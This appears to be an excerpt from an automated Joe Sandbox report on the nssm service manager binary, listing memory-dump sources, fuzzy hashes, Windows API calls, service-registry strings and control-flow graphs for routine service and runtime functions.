                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _snwprintf_s
                                                                                                                                                                                                                                  • String ID: LocalSystem
                                                                                                                                                                                                                                  • API String ID: 2338360151-3718507506
                                                                                                                                                                                                                                  • Opcode ID: 6743b1072aacb637b8fe2c8209ee1ea95c07b77bab8709beb798387aaa2a60c1
                                                                                                                                                                                                                                  • Instruction ID: 897542e7d10f4334a71864b38d4b1fc5c68d6c78a5a10421715beb890cdd0b3a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6743b1072aacb637b8fe2c8209ee1ea95c07b77bab8709beb798387aaa2a60c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 50918F72205B8182E722DB66B4003DA73A5F788BD8F84452AFF894B7B9DF39C855C711

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$CreateDeregisterErrorLastRegisterReport_snwprintf_s
                                                                                                                                                                                                                                  • String ID: AppExit$NSSM_REG_EXIT$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$create_exit_action()
                                                                                                                                                                                                                                  • API String ID: 3915943028-4149098550
                                                                                                                                                                                                                                  • Opcode ID: a6a197cceeffa5f1b060ae75d8c4cf84f7f81757312b39435ca9115167d739ae
                                                                                                                                                                                                                                  • Instruction ID: 286395e9d0cb373908b28d223f428cca8e0dfd71f0cef28fe7855765673cca6b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a6a197cceeffa5f1b060ae75d8c4cf84f7f81757312b39435ca9115167d739ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06417171208B8586E721DB62F8807DAB3A5F78D7A8F540226B79E43AE5DF3CC545CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast_snwprintf_s$AllocCreateLocalOpenValue
                                                                                                                                                                                                                                  • String ID: NSSM_REGISTRY$SYSTEM\CurrentControlSet\Services\%s\Parameters$SYSTEM\CurrentControlSet\Services\%s\Parameters\%s$open_registry()
                                                                                                                                                                                                                                  • API String ID: 2146963231-2180615361
                                                                                                                                                                                                                                  • Opcode ID: e1af8783c4dd298839d58d70b853b6990a968d323222d83e5a84aeac3a3d5968
                                                                                                                                                                                                                                  • Instruction ID: 9143b6e9e1b3ccbae830a0656e860355f552d31f2821e619ed30fd8a81ef8ea7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1af8783c4dd298839d58d70b853b6990a968d323222d83e5a84aeac3a3d5968
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD415E71204B8586EB61DBA6F4857DA72A1F78C7A4F900326B7AD87BE5DB3CC504C700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2551688548-0
                                                                                                                                                                                                                                  • Opcode ID: 9c01855ca2162d321a5b78de46019a7c0809fa4af65b79ef296b8063bd276328
                                                                                                                                                                                                                                  • Instruction ID: 2b441d41b5af1310c62e349557e00996ce64a0fd7d8a5ada7e371e02eaa41bf9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9c01855ca2162d321a5b78de46019a7c0809fa4af65b79ef296b8063bd276328
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1415D31215A4095FA63AB13E8403DA72D4B78DBC4F580529FF4D4BBB6EF7ACA558700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __doserrno_errno
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 921712934-0
                                                                                                                                                                                                                                  • Opcode ID: 8607ae7d51fe8df06ffb0d11cd1ca095a8d646f26843a3bf65796318edd9bf32
                                                                                                                                                                                                                                  • Instruction ID: a74102224676caa496a4271bf4079c63af4a13bbce5832a9c8e0bbbcad2c5b5e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8607ae7d51fe8df06ffb0d11cd1ca095a8d646f26843a3bf65796318edd9bf32
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E831CF3261069042E717AF6BA88179D3A52BB8A7E4FA54715FF250F7F2DE7EC4028700

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 761 140020460-14002047f 762 140020481-14002048c 761->762 763 1400204e7-14002052b GetConsoleOutputCP WideCharToMultiByte 761->763 764 14002049a-14002049e 762->764 765 14002048e call 140020ec4 762->765 766 14002055d 763->766 767 14002052d-140020548 WriteConsoleA 763->767 764->766 769 1400204a4-1400204c2 WriteConsoleW 764->769 772 140020493 765->772 771 140020562-140020573 call 140017480 766->771 767->766 770 14002054a-14002054f 767->770 773 140020551-14002055b 769->773 774 1400204c8-1400204cf 769->774 770->771 772->764 773->770 774->766 777 1400204d5-1400204de GetLastError 774->777 777->766 778 1400204e0 777->778 778->763
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide__initconout
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2210154019-0
                                                                                                                                                                                                                                  • Opcode ID: 63249f0768e40fa09d060de2b70e0b862332fbd7d886b4aea27cb59747b651c6
                                                                                                                                                                                                                                  • Instruction ID: 7672c9d94efcb177cd3854e9b866c986b77e675c68db11007f400f319d7e57f9
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 63249f0768e40fa09d060de2b70e0b862332fbd7d886b4aea27cb59747b651c6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD312A72214A4082EB229B56E8443AA67A0F78A7B9F900309F769079F5CF7DCD48CB00

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0000000140011090: GetProcessHeap.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 0000000140011096
                                                                                                                                                                                                                                    • Part of subcall function 0000000140011090: HeapAlloc.KERNEL32(?,?,?,?,?,00000001400086D1), ref: 00000001400110AA
                                                                                                                                                                                                                                  • _snwprintf_s.LIBCMT ref: 0000000140013D31
                                                                                                                                                                                                                                  • _snwprintf_s.LIBCMT ref: 0000000140013DB9
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007220: _vfwprintf_p.LIBCMT ref: 0000000140007251
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007220: LocalFree.KERNELBASE(?,?,?,00000000,0000000140001065), ref: 0000000140007259
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Heap_snwprintf_s$AllocFreeLocalProcess_vfwprintf_p
                                                                                                                                                                                                                                  • String ID: pre_install_service()$service
                                                                                                                                                                                                                                  • API String ID: 3309010533-3337766052
                                                                                                                                                                                                                                  • Opcode ID: 3845fc4f31667b9c334532f5fb35cf361df664cdaa9b5ba8ca0f05bbffc1b766
                                                                                                                                                                                                                                  • Instruction ID: 8eef640bce74c844a7089964cb40a6ac740596f6eaf6f8f9d8452f3542dcaa0b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3845fc4f31667b9c334532f5fb35cf361df664cdaa9b5ba8ca0f05bbffc1b766
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB51C272615B8582EA12EB62F4013DA63A5F7487F4F455321BFBA1B7E6DB39C942C300

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 823 1400189b4-1400189fa GetStartupInfoA call 140018d10 826 140018a04-140018a1d 823->826 827 1400189fc-1400189ff 823->827 829 140018a62-140018a68 826->829 830 140018a1f-140018a5a 826->830 828 140018c7f-140018ca0 827->828 832 140018bb7-140018bba 829->832 833 140018a6e-140018a76 829->833 830->830 831 140018a5c 830->831 831->829 834 140018bbd-140018bcf 832->834 833->832 835 140018a7c-140018a97 833->835 836 140018bd1-140018bd5 834->836 837 140018bdd-140018c05 GetStdHandle 834->837 838 140018b2a 835->838 839 140018a9d 835->839 836->837 840 140018bd7-140018bdb 836->840 842 140018c51-140018c55 837->842 843 140018c07-140018c0a 837->843 841 140018b31-140018b37 838->841 844 140018aa4-140018ab7 call 140018d10 839->844 845 140018c5c-140018c66 840->845 841->832 846 140018b39-140018b3d 841->846 842->845 843->842 847 140018c0c-140018c18 GetFileType 843->847 854 140018b22-140018b28 844->854 855 140018ab9-140018ad6 844->855 845->834 850 140018c6c-140018c7a SetHandleCount 845->850 851 140018baa-140018bb5 846->851 852 140018b3f-140018b43 846->852 847->842 853 140018c1a-140018c23 847->853 850->828 851->832 851->846 852->851 856 140018b45-140018b4a 852->856 857 140018c25-140018c29 853->857 858 140018c2b-140018c2e 853->858 854->841 859 140018ad8-140018b11 855->859 860 140018b19-140018b1e 855->860 856->851 861 140018b4c-140018b51 856->861 862 140018c34-140018c45 call 14001d1f0 857->862 858->862 863 140018c30 858->863 859->859 865 140018b13 859->865 860->844 866 140018b20 860->866 867 140018b61-140018b99 call 14001d1f0 861->867 868 140018b53-140018b5f GetFileType 861->868 872 140018c47-140018c4a 862->872 873 140018c4c-140018c4f 862->873 863->862 865->860 866->841 874 140018ba2-140018ba5 867->874 875 140018b9b-140018ba0 867->875 868->851 868->867 872->845 873->828 874->828 875->851
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetStartupInfoA.KERNEL32 ref: 00000001400189D9
                                                                                                                                                                                                                                    • Part of subcall function 0000000140018D10: Sleep.KERNEL32(?,?,?,000000014001AFB3,?,?,00000000,000000014001A221,?,?,?,?,00000001400178E3), ref: 0000000140018D55
                                                                                                                                                                                                                                  • GetFileType.KERNEL32 ref: 0000000140018B56
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileInfoSleepStartupType
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1527402494-0
                                                                                                                                                                                                                                  • Opcode ID: c2bba7cd1edbe2617c1b3dbb0035182a570060710873b5583ad2478f203e423d
                                                                                                                                                                                                                                  • Instruction ID: 3b2f6317719b2011b2ad41e080283deb0c308c9ef8a7d262913822a70a31a9df
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2bba7cd1edbe2617c1b3dbb0035182a570060710873b5583ad2478f203e423d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0E91A17220478081E7268B2AD88879837A9F3597F4F658725EB794B3F1DB3ADD42C311

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CommandInitializeLine_cinit
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2063639010-0
                                                                                                                                                                                                                                  • Opcode ID: cdb002d3f84936ef04eaebcedb558412cbd260ca3ec305f6be8826da44243583
                                                                                                                                                                                                                                  • Instruction ID: 75c5582d93638233de64f4769a08a9351a23f43baf901fd4378c528024261ae6
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cdb002d3f84936ef04eaebcedb558412cbd260ca3ec305f6be8826da44243583
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F5411E3160424586F777ABA7A4913EA32A5AB8D3C4F940039BF458F6F2DF7ACA448711

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 938 140001b00-140001b0d GetConsoleWindow 939 140001b33-140001b37 938->939 940 140001b0f-140001b1f GetWindowThreadProcessId 938->940 940->939 941 140001b21-140001b2b GetCurrentProcessId 940->941 941->939 942 140001b2d FreeConsole 941->942 942->939
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ConsoleProcessWindow$CurrentFreeThread
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3525601419-0
                                                                                                                                                                                                                                  • Opcode ID: b0f2898e6c2b7c7542a423034d0351429fbb60568f28bf1d9610acc3ad20c969
                                                                                                                                                                                                                                  • Instruction ID: 30745600ccbaa13542714c77d69feb18f0cabad637e12a41575fe39ddfe39476
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0f2898e6c2b7c7542a423034d0351429fbb60568f28bf1d9610acc3ad20c969
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B9E0EC70621541D6FA46BF93A8443DA33E0BB9CB81F801408F64643270EF38D9558621
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerW.ADVAPI32 ref: 000000014000FF40
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: RegisterEventSourceW.ADVAPI32 ref: 0000000140007183
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: ReportEventW.ADVAPI32 ref: 00000001400071F8
                                                                                                                                                                                                                                    • Part of subcall function 0000000140007160: DeregisterEventSource.ADVAPI32 ref: 0000000140007201
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Event$Source$DeregisterManagerOpenRegisterReport
                                                                                                                                                                                                                                  • String ID: ServicesActive
                                                                                                                                                                                                                                  • API String ID: 2921005559-3071072050
                                                                                                                                                                                                                                  • Opcode ID: 6ce3ff863d5db9db903d9ebda9676157f161ddfec0ee6080eb634adb3206fb08
                                                                                                                                                                                                                                  • Instruction ID: a9e3c8661430c80a7261790fe5ff582f8a0a250a0fb43188a04a0ea2cc5943d0
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6ce3ff863d5db9db903d9ebda9676157f161ddfec0ee6080eb634adb3206fb08
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 22E0C2B071125152FB5B93236851BF911815B0E7C0FC0942EB6454BAE1CC3D8845D700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _errno$DecodePointer
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2310398763-0
                                                                                                                                                                                                                                  • Opcode ID: e4e2b071b51d4e2e2d65d5337b791588ceca527f458e43cb485e2f81abe41ed2
                                                                                                                                                                                                                                  • Instruction ID: 46dc89109b5dc7b9041c561d8600b7a41cb3f40d4aaf26f368046d076f9ea614
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e4e2b071b51d4e2e2d65d5337b791588ceca527f458e43cb485e2f81abe41ed2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4511347271474142F7169B7B6942BAF6262BB9E7D4F048225BF144BBE6CF7EC4014700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegSetValueExW.KERNELBASE(?,?,?,?,00000000,000000014000E94D), ref: 000000014000DF12
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,000000014000E94D), ref: 000000014000DF27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1151882462-0
                                                                                                                                                                                                                                  • Opcode ID: a8175889ff462d505af2dfa4ab2da46091607e322ed16c0c83c75574af433037
                                                                                                                                                                                                                                  • Instruction ID: 9298e4ccd96eec79086780fadee584a020bc5c0e361da4134b5b477089eaa6e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a8175889ff462d505af2dfa4ab2da46091607e322ed16c0c83c75574af433037
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0901F27170468043E7119B7AF450BAFA2A1E789BF8F584325FFAA47BE5CA3CC9514700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140018903), ref: 000000014001D894
                                                                                                                                                                                                                                  • FreeEnvironmentStringsW.KERNEL32(?,?,00000001,0000000140018903), ref: 000000014001D8EB
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000013.00000002.2123994702.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2123962686.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124033046.0000000140022000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124062615.0000000140029000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000013.00000002.2124094272.000000014002D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_19_2_140000000_nssm.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnvironmentStrings$Free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3328510275-0
                                                                                                                                                                                                                                  • Opcode ID: 7723b04e3743090e248c9e4189b8bbfe3450c83525c766d75ac6912cbeed71e5
                                                                                                                                                                                                                                  • Instruction ID: 8209264deff9cfccf7757d754be8505c15b758b4da2fcb51525963ecf9a259c8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7723b04e3743090e248c9e4189b8bbfe3450c83525c766d75ac6912cbeed71e5
